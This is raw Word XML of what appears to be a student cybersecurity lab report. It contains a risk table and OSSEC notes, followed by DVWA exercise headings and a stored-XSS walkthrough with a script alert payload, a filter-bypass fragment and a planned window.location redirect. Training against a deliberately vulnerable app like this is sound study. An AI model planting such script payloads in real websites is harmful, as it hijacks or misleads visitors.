          <w:p w14:paraId="589FC757" w14:textId="55776411" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>High (3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A84CA2E" w14:textId="5FBAE229" w:rsidR="00F935E5" w:rsidRDefault="00AB5F19" w:rsidP="00AB5F19">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F935E5" w14:paraId="704E380D" w14:textId="034D2400" w:rsidTr="00F935E5">
        <w:trPr>
          <w:trHeight w:val="880"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1842" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="501F96E1" w14:textId="44CD70B0" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Phishing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66EC0922" w14:textId="49516283" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Physical damage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1816" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08273D90" w14:textId="7A63787A" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Low (2)</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38598FAA" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00846024">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Session Hijacking and Man-in-the-Middle Attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59949724" w14:textId="37131AE1" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Customer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DA7DCFA" w:rsidR="00F935E5" w:rsidRDefault="00F935E5" w:rsidP="000B33BC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Low (1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1561" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="300A86B0" w14:textId="3FD68FBA" w:rsidR="00F935E5" w:rsidRDefault="00AB5F19" w:rsidP="00AB5F19">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Low</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t>Very likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6752D9B9" w14:textId="77777777" w:rsidR="00AB5F19" w:rsidRDefault="00AB5F19" w:rsidP="00A15DF8">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="606941E7" w14:textId="4F782E54" w:rsidR="00AB5F19" w:rsidRPr="005669E8" w:rsidRDefault="005669E8" w:rsidP="005669E8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005669E8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SQL Injection Attack.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70777947" w14:textId="5B121981" w:rsidR="005669E8" w:rsidRDefault="005669E8" w:rsidP="00A15DF8">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3274884A" w14:textId="77777777" w:rsidR="00AB5F19" w:rsidRDefault="00AB5F19" w:rsidP="00A15DF8">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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0899A9BF" w14:textId="77777777" w:rsidR="00AB5F19" w:rsidRDefault="005669E8" w:rsidP="005669E8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005669E8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>XSS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B921CDF" w14:textId="77777777" w:rsidR="005669E8" w:rsidRDefault="005669E8" w:rsidP="005669E8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Phishing</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C583498" w14:textId="0D3A1739" w:rsidR="005669E8" w:rsidRPr="005669E8" w:rsidRDefault="005669E8" w:rsidP="005669E8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EE694F1" w14:textId="77777777" w:rsidR="00AB5F19" w:rsidRDefault="00AB5F19" w:rsidP="00A15DF8">
            <w:pPr>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3F384618" w:rsidR="00AB5F19" w:rsidRPr="005669E8" w:rsidRDefault="005669E8" w:rsidP="005669E8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005669E8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Session Hijacking and Man-in-the-Middle Attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2254" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CDD4398" w14:textId="77777777" w:rsidR="00AB5F19" w:rsidRDefault="005669E8" w:rsidP="005669E8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005669E8">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DDoS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D01474C" w14:textId="1218C5A3" w:rsidR="005669E8" w:rsidRPr="005669E8" w:rsidRDefault="005669E8" w:rsidP="005669E8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Dropping Database</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7214036" w14:textId="51A95439" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6810EB3E" w14:textId="6C1D8FE0" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="452562DC" w14:textId="464E6DB5" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D3A626" w14:textId="5799E123" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="455ED3AE" w14:textId="61EB9D7D" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2705B81A" w14:textId="2174824E" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DB7C168" w14:textId="5D8368CE" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15587F41" w14:textId="7F16A0F9" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="222A71C9" w14:textId="515BF347" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F90BAAA" w14:textId="7E55FDB8" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43F3869C" w14:textId="707FF7CB" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="785220E0" w14:textId="01C43494" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F21C756" w14:textId="2DE92994" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64ECDC7E" w14:textId="6DD3C3C8" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="700AD314" w14:textId="6A50972E" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30C4B5B9" w14:textId="057C5746" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E2CBC79" w14:textId="65472F98" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76F9B88D" w14:textId="6529ED5C" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1483D13E" w14:textId="1FFF03CD" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1541A5DE" w14:textId="1284F9B0" w:rsidR="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="126B85B8" w14:textId="77777777" w:rsidR="00A15DF8" w:rsidRPr="00A15DF8" w:rsidRDefault="00A15DF8" w:rsidP="00A15DF8">
      <w:pPr>
        <w:rPr>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5553323"/>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5553324"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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lastRenderedPageBreak/>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lastRenderedPageBreak/>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lastRenderedPageBreak/>
        <w:t xml:space="preserve">I will do something optional which is </w:t>
      </w:r>
      <w:r w:rsidR="006D7616">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">installing OSSEC in windows. I could add agent like I did for Ubuntu. Then I enter the windows name and ip. I should get a key that is unique for windows. Install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006D7616">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ossec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006D7616">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and add the server ip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lastRenderedPageBreak/>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lastRenderedPageBreak/>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lastRenderedPageBreak/>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lastRenderedPageBreak/>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lastRenderedPageBreak/>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5553325"/>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5553326"/>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560F9B61" w14:textId="0414C3C5" w:rsidR="007C322B" w:rsidRPr="00A73FE2" w:rsidRDefault="007C322B" w:rsidP="005325E0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc115553327"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DVWA (Damn Vulnerable Web Application)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="452A4F7C" w14:textId="77777777" w:rsidR="007C322B" w:rsidRPr="00A73FE2" w:rsidRDefault="007C322B" w:rsidP="007C322B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="744FF039" w14:textId="7F628FE6" w:rsidR="0095033A" w:rsidRPr="00A73FE2" w:rsidRDefault="00C64063" w:rsidP="005325E0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc115553328"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:t xml:space="preserve">Path Traversal </w:t>
      </w:r>
      <w:r w:rsidR="00E67820">
        <w:t>(2.1)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>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6" w:name="_Toc115553329"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:t>Brute Force</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>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7" w:name="_Toc115553330"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:t>Brute Force – Low level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>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D48392B" w:rsidR="00D7708B" w:rsidRPr="00A73FE2" w:rsidRDefault="00D7708B" w:rsidP="005325E0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc115553331"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:t>SQL injection</w:t>
      </w:r>
      <w:r w:rsidR="00E67820">
        <w:t xml:space="preserve"> (3.1)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>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9" w:name="_Toc115553332"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:t>SQLi – Low level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>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20" w:name="_Toc115553333"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:lastRenderedPageBreak/>
        <w:t>SQLi – Medium level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>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21" w:name="_Toc115553334"/>
      <w:r>
        <w:t>SQLi – Online Challenges</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>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42B83D3B" w:rsidR="00F04227" w:rsidRPr="00A73FE2" w:rsidRDefault="00F04227" w:rsidP="005325E0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc115553335"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:t>Command Injection</w:t>
      </w:r>
      <w:r w:rsidR="00E67820">
        <w:t xml:space="preserve"> (2.1)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>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3" w:name="_Toc115553336"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:t>Command Injection – Low level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>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4" w:name="_Toc115553337"/>
      <w:r w:rsidRPr="00A73FE2">
        <w:t>Command Injection – Medium level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>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9"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5" w:name="_Toc115553338"/>
      <w:r>
        <w:t>CSRF (4.1)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>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6" w:name="_Toc115553339"/>
      <w:r>
        <w:t>CSRF – Low Level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>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7" w:name="_Toc115553340"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">XSS </w:t>
      </w:r>
      <w:r w:rsidR="00075BF0">
        <w:t xml:space="preserve">DOM </w:t>
      </w:r>
      <w:r>
        <w:t>(4.1)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>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F125E75" w:rsidR="00075BF0" w:rsidRDefault="00075BF0" w:rsidP="00075BF0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc115553341"/>
      <w:r>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="006D2153">
        <w:t xml:space="preserve"> DOM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Low Level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>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 xml:space="preserve">We can inject a script tag between the option tag, and it would be executed. How to inject the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">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7D962BD7" w:rsidR="008F1777" w:rsidRDefault="008F1777" w:rsidP="008F1777">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc115553342"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="006D2153">
        <w:t xml:space="preserve"> DOM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Medium Level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>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r w:rsidRPr="00782BA9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>’)&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00782BA9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>sscriptcript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00782BA9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w: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538D45E7" w:rsidR="00FD42C1" w:rsidRDefault="00FD42C1" w:rsidP="00FD42C1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc115553343"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidR="006D2153">
        <w:t xml:space="preserve"> DOM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – High Level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">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6D2F4F4E" w:rsidR="00B05ED2" w:rsidRDefault="00B05ED2" w:rsidP="00B05ED2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc115553344"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>XSS Stored</w:t>
      </w:r>
      <w:r w:rsidR="003447C4">
        <w:t xml:space="preserve"> &amp; Reflected</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (4.1)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="0AFA3B3D" w14:textId="3CBF498F" w:rsidR="001022E9" w:rsidRDefault="001022E9" w:rsidP="00B05ED2"/>
    <w:p w14:paraId="1175C7D9" w14:textId="5AAFB143" w:rsidR="001022E9" w:rsidRDefault="001022E9" w:rsidP="00B05ED2">
      <w:r>
        <w:t>XSS Stored is injecting code to the database that will remain in there permanently. The website developer would need to reset the database or remove the code manually to clean the website from suspicious activities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213037A0" w14:textId="3866404C" w:rsidR="005F0A5C" w:rsidRDefault="005F0A5C" w:rsidP="00B05ED2">
      <w:r>
        <w:t xml:space="preserve">XSS Stored is </w:t>
      </w:r>
      <w:r w:rsidRPr="005F0A5C">
        <w:t>persistent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as it stays in the database until someone manually removes it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB5F025" w14:textId="7A84FB75" w:rsidR="006D2153" w:rsidRDefault="006D2153" w:rsidP="00B05ED2">
      <w:r>
        <w:t xml:space="preserve">XSS Reflected is </w:t>
      </w:r>
      <w:r w:rsidR="005F0A5C">
        <w:t>when the website receives HTTP data and includes that data within the response which may cause damage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11022AAA" w14:textId="76C84DAF" w:rsidR="001022E9" w:rsidRDefault="001022E9" w:rsidP="001022E9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc115553345"/>
      <w:r>
        <w:t>XSS Stored</w:t>
      </w:r>
      <w:r w:rsidR="003447C4">
        <w:t xml:space="preserve"> &amp; Reflected</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Low Level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="4F9F5630" w14:textId="27A86E7C" w:rsidR="001022E9" w:rsidRDefault="001022E9" w:rsidP="001022E9">
      <w:r>
        <w:t xml:space="preserve">The objective is to redirect the users to another page immediately after loading the </w:t>
      </w:r>
      <w:r w:rsidR="00F45DAB">
        <w:t>website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32889EF0" w14:textId="51528002" w:rsidR="00F45DAB" w:rsidRDefault="00F45DAB" w:rsidP="001022E9">
      <w:r>
        <w:t xml:space="preserve">For redirecting, I could use a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> function which is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>window.location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>() to direct the user to another page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6505AE0E" w14:textId="24607A26" w:rsidR="00F45DAB" w:rsidRDefault="00F45DAB" w:rsidP="001022E9">
      <w:r>
        <w:t>I also need to find a way to force the code to stay in the database permanently or until someone manually decides to remove it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243AC4D8" w14:textId="017B8DAB" w:rsidR="00F45DAB" w:rsidRDefault="00F45DAB" w:rsidP="001022E9">
      <w:r>
        <w:t>DVWA offers me 2 inputs that I can POST:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF6955C" w14:textId="2894C84D" w:rsidR="00F45DAB" w:rsidRPr="001022E9" w:rsidRDefault="00F45DAB" w:rsidP="001022E9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AF331D6" wp14:editId="092D43F5">
            <wp:extent cx="5725160" cy="24809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0F8D038B" w14:textId="280ED1E0" w:rsidR="0087543D" w:rsidRDefault="00F45DAB" w:rsidP="001022E9">
      <w:r>
        <w:t>The good thing that the messages load as the same time with the actual website. Meaning the messages will load permanently just like we needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B963E36" w14:textId="304FBC89" w:rsidR="00F45DAB" w:rsidRDefault="00F45DAB" w:rsidP="001022E9">
      <w:r>
        <w:t>For instance, in the Message field, if I added the code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0099C0" w14:textId="3AEC1BBD" w:rsidR="00F45DAB" w:rsidRDefault="00F45DAB" w:rsidP="001022E9">
      <w:r w:rsidRPr="00F45DAB">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(‘Hello World’)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF0E9F8" w14:textId="34A3959F" w:rsidR="00F45DAB" w:rsidRDefault="00F45DAB" w:rsidP="001022E9">
      <w:r>
        <w:t>Every user that visits that website would get an alert</w:t>
      </w:r>
      <w:r w:rsidR="00607F8A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00607F8A">
        <w:t>says</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00607F8A">
        <w:t xml:space="preserve"> “Hello World” After the alert they can proceed to the website. The process would take place every time someone visits the website without any differences.</w:t>
      </w:r>
    </w:p>
